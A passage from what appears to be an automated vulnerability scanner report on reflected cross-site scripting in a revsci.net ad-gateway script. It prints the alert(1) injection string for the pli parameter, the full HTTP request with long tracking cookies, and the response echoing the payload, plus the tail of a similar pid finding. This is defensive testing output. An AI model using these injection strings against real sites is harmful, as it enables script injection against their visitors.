Set-Cookie: udm_0=MLv3NzMJZjpn3hc5wM3ROeR1HOKnJulKw7Gjxf3XhmS6ZRcAqjvfc+GlmxOUGQTKjb6JvVSf8/FRbsFkA1p08J5yrbB1dzLkfbfpfXnlpuZIoxq/azLQku7xf+0Z446YCAUXVS4D8BVH3535U6jLgv2boj7KFmrT2TkyMh34/g4QJvj6Xt89sGyHzRLJ0FPyhFYHWLCJ2Ge5DYT8hUo2fjpDLMSlTKW0kUXvKlo+s+N4bAPTRFpwjge+Zj7Vl/XOPZqlUsVZztYcb8fbtxY9La+PNdAlZOjmeK/pOvQzkhCfY2EY0Q9ikXLlRK1Js/b6zIQ81MFQFsYhjfJo2AeWthEHyjnJ85Wu6I/VMCY+LEm5JIV+uiCWAyloDtMnhEEOOVL0s6OvriKR9nzC8/dsMFqaWLVrMhKIWMlxran1ExzPvZUEyRsoC8MXhVkTleE5aCBAovmVuuAdP5MVCsGd5ohaNZJm8rV3TNKgfnvdUDSzWoLt1fO8XXCUKEKNReH4V0wf9sqhkn27uxyFnD7XwN3mm0cDytNX8Ivxa5riA0u/yDKQ+7nrHpVSDDGYkLyOYjAJVamhkT7g9YGK8cX+mcH4ICWp1dEoE1P6Ikc2RzP+S0K+OyZN6B9Dm1wwZP1Mr9qcWQYuRWX4atL4sc4Xj480Cqxk05sSAtV5gFDsTFkx3LBgJYp6DM1xQZLCubszFiwCsHIMAyyHf2WhvU7+x4iaXZnWT+qFrXA7U7M4SIHPpHmCXJ+qy1KTQKx8HT4eC1qbRk6Oz1h1DFk6ihD5lTgBqoxSLLO0x6/5YGfcTq0frDAjfLtwK5c/9Ab78IvDT27XIIuCzE4xyzqg4Uve/ed9uZlukCIgGWjEa8i5/rB+5fCuDB6/Bul3HAbbSE4i2J7DzAUY9mBAi7cQTYtUmcaY3qDJFrYK8/BbWkIaztu0tYiQwx0givCwddaHZWtfkbDxXdI7QD5PCyun5Czn5Q8ZO+OkiDpfNybi964YlJAYqDapePker9+E5eCIWhFR3+lr5l/tvAgZt6MVlF9UNzizLgDAKwK1LDtbdANn5s8X801ofcgOiJiLp70H7B6OZCqlJq8bQfX458B1xUsxN4NccIbxJNeN98bkW9voHDtaCJ6VInzDy3wQkljEC6bnSmgsCIsp5AAj509Yy7pPq6SFhUEAqytAz08dHrRZGdO3ALAfNCuWQtdrP3HkiI0VjPXND1CerwC0EzC2N0ip2PMK5tB40FXwJzE5EIUwFNu+JRETwzPe9v2oj+69IqoiRhNIwgQrpBLOLW87eyEGLznGbPLZwXuBo3z6IyaHbmizqX/LwhbKK2CG/DfxUOkOPDTW06L0w9CLIuSjt5jtsYyRt0R5ybXaYpdy8Xly7PBfXEnH+XsyQdVWs3Z2H6ZqO9Aq4wcvDuPslRUoZ8ApJQdXuPYfmUCr/kFABNnY15zvYlX1JpYUkz5zoabXSn7/tQjKGlD8rxMS7g42xgxRvC316eFcHMTvv5F1Ew7jE3YEFvc+Be+QucEErhczo9nIMwlZeipGEA3wGfVwwE2+WNdEYS8Cvu81cz73s0U263OUE84naeVS9sIS0ozOHHjs3Fx5YlldCnWncKL8Bi1d5XaQdwRFxLuwN3UaGiyZfb6pKF3bGezqY5ZtEInPeh2QZXY7SKjZaqvqYuZ1kPrQGEXgrquntICIKktyR9Xr7/r/Fll4sn9i2yAMNHbDSYFCLPZdeVk9diOjB+PEtchseihNYsZGtkSkYqkglS67loqpPhhwBx0vDYBKKuC6Nradx+PTsaFdC00/x21ZAmVxpwenJkgTKUQJwvAM+CANoLUxRbK4mV2BlyrPeRX3bT+j850uVeQ925E/w7m6GA==; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:00:58 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:00:58 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:00:58 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:00:58 GMT
Content-Length: 6236

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','432');
A10868.DM_addEncToLoc('vid', '6127792');
A10868.DM_addEncToLoc('pid', '456378fdf69';alert(1)//26368a3b0cf');
A10868.DM_addEncToLoc('pli', '2120305');
A10868.DM_addEncToLoc('sid', '1887835');
A10868.DM_addEncToLoc('ali', '3130307');
A10868.DM_addEncToLoc('cid', '9518378');
A10868.DM_addEncToLoc('p', '275
...[SNIP]...

1.311. http://js.revsci.net/gateway/gw.js [pli parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the pli request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9781e'%3balert(1)//9000e16a98 was submitted in the pli parameter. This input was echoed as 9781e';alert(1)//9000e16a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=432&vid=6127792&pid=456378&pli=21203059781e'%3balert(1)//9000e16a98&sid=1887835&ali=3130307&cid=9518378&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NyMJZgprXhc5wM3ROeR1HOKnJulKw7Gjxf3XhmVt5iC8k6ftpcIAk1+BGkhVFxSTuxCoSEA/BMl46b8heqkwFSd8QQRhfbfpfXnlpiJ9BkYHf6k5gmc6hLt2tTfvWtGMQqBPor0croXb/5yJOZh/ne+iF7uvO+08ULKX64oUIYDzP/JAf3SiEQYBoV6H/mgSHJyQGVK1v9f2zO3W31WzAkQEQw3uKNFpZoikb2GzId9uoZSRCaJK7Ibc2xaaidZZUs+eMDXDiTVHPz6+piD6pWILBykCCL8S1fDYS1ByBaoQReF1YVp0pPbPYC1XuBJC/3QScHL+tIjDwGWo68ET1zC+SFSL1DJZHGfQYkqqFB5rfGkRcj/h/AFyKaKA7GIDFBhvOniVT9VzHkXzrJ/DTNlsXi0k9vgH3MNTNJdrBjZV8jYHNMPcXTAfqPcRBBr+fE+bsYamppMWJ7g8Z+DwaCDj1KW0eK6x0sxfhzxxNhzSFrEx7/3WaFJRra4rR66+me+bnrO520iMcySQXTUtUa2Ad+41PxWiqK0Xg5P0f4ekrL5TgqvkuzfHqXMo1tMxyrf7WAzzjT6oFY7vB3BtbZqwFwy9KG9v+cSEGDNoRBd7zUiN++Ivag2hq8LmT10MgURs8rgg/XvompGGLyf3AqSBQUBWq3Mfzf7u9iZlRSEmn58CuH5F16rvLGXxRiPNoV635s8fhJ4DhHm63MyTWZmnFQ7esYrQOH/jkLu/XpmmpxDvXCrcv4Hfu8XOM1gIzk6BQsGcwYCgtvSuGBaYiovl35Y0nLuLry+sz5FkREaBYyU2kToZmeI1z9a4SsIcIo6vQTrcK76zCs3qojopjWoFzZtuqP0QJdqYcZS9my81Rk1MS1kfuMauVBKIpxdlN1IK+yBoipnYxwW+yKZvlsKEUZLGqppdJV4s3Kf08XyDrJeKB0+yBcJcj6KYuCfJaX8ZhD1sN1627GxXjKQw7gGlk+sncYQd0ah5ydFCHaVRLMi4thHgmQ6Vz4pHo9wGviI1PvMxxgwb5q2byMjIzFGLTEoNLjt8a/vqg2QgDbqwxzkBhJ+M8S9SzT3ZacQShQws6eqnya6Fgucy+5CzJHaCX0UjUFLa+U5VteAfNd5ZjFpRt5PahDjVMQGvArVdeIU98Epe3wL3ByPzYkvGqAGnpI/WBhO8LxTgvJ3RqXQK1qFOtB8+eNFRaH1KZE25uK3tWzCsWJ+Juq/A0e1s1HbCOM8nB9igodhhGFc6TH5UkrlJtQQnVQHLmz8uPg7L64NKbAplV6pq/7tIwaChWGuZV4oC6DlEqXruLLjSGUHIOsgHxEKl0muoq0WVrcHpp3HYXcnNXKQBPDqf1lUqsh4w1iWaeVkjlR5TlSPFQ2Vz1T4lOi11BNQpG1DNI1f4c2X3C5FAivavWCybAeAyK8nxSAjBbLQGD9NRIMZ8BxoeRehiP9odhcOWalzyn9dQWUDJoECWGl+ZAJhdtlgKlDLLG5xQYYXomBQno/C79Ei6DDmHTcv/bor6f6LKlKBhAxDMKDRx/Cym71AYWz0rBcdziThD9TD6XMNF+gvXJC3GO+qU1XlSOb8sX+K/14UHy1SFahYyvZjPIjE2fCazQ5A6n7Y4563lSBozSqkmKr6dAQQ3dFX7CMr4UY2Mx5jMkC8jXPDjRNfwNX4CIHAw2Vxz9R1Tx0DNTyyZ9atRcAArGm81dlOuE3KIeyDdMgznbIAIg2EnvUhkr2yTGaUF5ci123dBaQZyMTGFlw5AEGEZdc+dEhZWW69DzEH0nuBJARn8jwyR/sOiumZaP845MfHt/CZln2l53e5U55t6ZtsXX4EmGW/0Oa2or8LmLiyTl+qx4BnQFSTP4oCCFT5LeptxdKrGUg==; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:00:59 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:00:59 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:00:59 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:00:58 GMT
Content-Length: 6235

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
